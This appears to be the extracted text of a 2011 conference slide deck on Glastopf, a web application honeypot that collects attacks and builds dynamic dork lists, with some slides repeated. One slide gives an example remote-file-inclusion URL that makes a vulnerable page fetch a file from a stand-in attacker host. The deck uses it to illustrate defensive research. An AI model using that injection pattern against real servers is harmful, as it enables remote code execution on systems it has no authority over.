Glastopf - Looking for trouble?Low interaction web application honeypot
Lukas Rist
Glastopf Project
March 21, 2011
Agenda
• Glastopf Project• Glastopf Web Application Honeypot• Awesome Live Action• Q&A
Lukas Rist Glastopf - Looking for trouble?, 1 of 14
Boring History Part
• Started December 2008, Minimal Python Web Server• GSoC 2009• End of 2009, joining Honeynet Project
• Bachelor Thesis: GlastopfNG• GSoC 2011?
Lukas Rist Glastopf - Looking for trouble?, 2 of 14
Boring History Part
• Started December 2008, Minimal Python Web Server• GSoC 2009• End of 2009, joining Honeynet Project
• Bachelor Thesis: GlastopfNG• GSoC 2011?
Lukas Rist Glastopf - Looking for trouble?, 2 of 14
Project Goals
• Powerful Web Application Honeypot• Collecting Attacks• Gain Intelligence
• Fighting Cyber Threads (script kiddies?)
Lukas Rist Glastopf - Looking for trouble?, 3 of 14
Project Goals
• Powerful Web Application Honeypot• Collecting Attacks• Gain Intelligence
• Fighting Cyber Threads (script kiddies?)
Lukas Rist Glastopf - Looking for trouble?, 3 of 14
Introducing the Glastopf Honeypot
• Motivation• Architecture• Dynamic Dork List• Distributed Set-Up• GlastopfNG
Lukas Rist Glastopf - Looking for trouble?, 4 of 14
Motivation
• Lots of Attacks against Web Servers• Sensitive Data & Trust• Compromised Servers
• New Approach vs. Other Projects
Lukas Rist Glastopf - Looking for trouble?, 5 of 14
Motivation
• Lots of Attacks against Web Servers• Sensitive Data & Trust• Compromised Servers
• New Approach vs. Other Projects
Lukas Rist Glastopf - Looking for trouble?, 5 of 14
Architecture
Lukas Rist Glastopf - Looking for trouble?, 6 of 14
Dynamic Dork List
• Previous: Static templates• New, dynamic and automated Approach• Disadvantages
Lukas Rist Glastopf - Looking for trouble?, 7 of 14
• Attack:http://victim.com/vulnerable.php?color=http://evil.com/bad.txt
• Dork:vulnerable.php
• Search Robot crawles the list
• Search request:inurl:vulnerable.php
• Search result:http://example.com/
Lukas Rist Glastopf - Looking for trouble?, 8 of 14
Distributed Set-Up
• Many Domains• Central Database• htaccess redirects
• Invisible Links• Wordpress Plug-in
Lukas Rist Glastopf - Looking for trouble?, 9 of 14
Distributed Set-Up
• Many Domains• Central Database• htaccess redirects
• Invisible Links• Wordpress Plug-in
Lukas Rist Glastopf - Looking for trouble?, 9 of 14
Stuff we collect
• ID Files• Spreader, (DDoS) Bots• Shells, Backdoors• Drive-by Kits• ...
Lukas Rist Glastopf - Looking for trouble?, 10 of 14
GlastopfNG
• Same approache different Implementation• Modularity• Lightweight xml Configuration and Rules• Porting Modules
Lukas Rist Glastopf - Looking for trouble?, 11 of 14
Web Server Botnets
• Imagine a Web Server Botnets Power• Between 10 and 1k Bots
• PHP Sandbox• Dirty Python IRC Client, HALE?
Lukas Rist Glastopf - Looking for trouble?, 12 of 14
Web Server Botnets
• Imagine a Web Server Botnets Power• Between 10 and 1k Bots
• PHP Sandbox• Dirty Python IRC Client, HALE?
Lukas Rist Glastopf - Looking for trouble?, 12 of 14
Awesome Live Action (aka Demo)
• Live Glastopf Sensor• Attacking Glastopf• Dynamic Dork List• Collected File• (IRC C&C Server)
Lukas Rist Glastopf - Looking for trouble?, 13 of 14
Questions, Answers and Contact
• Questions?• Answers
• Contact: http://glastopf.org• Lukas: [email protected]• Thanks!
Lukas Rist Glastopf - Looking for trouble?, 14 of 14
Questions, Answers and Contact
• Questions?• Answers• Contact: http://glastopf.org• Lukas: [email protected]• Thanks!
Lukas Rist Glastopf - Looking for trouble?, 14 of 14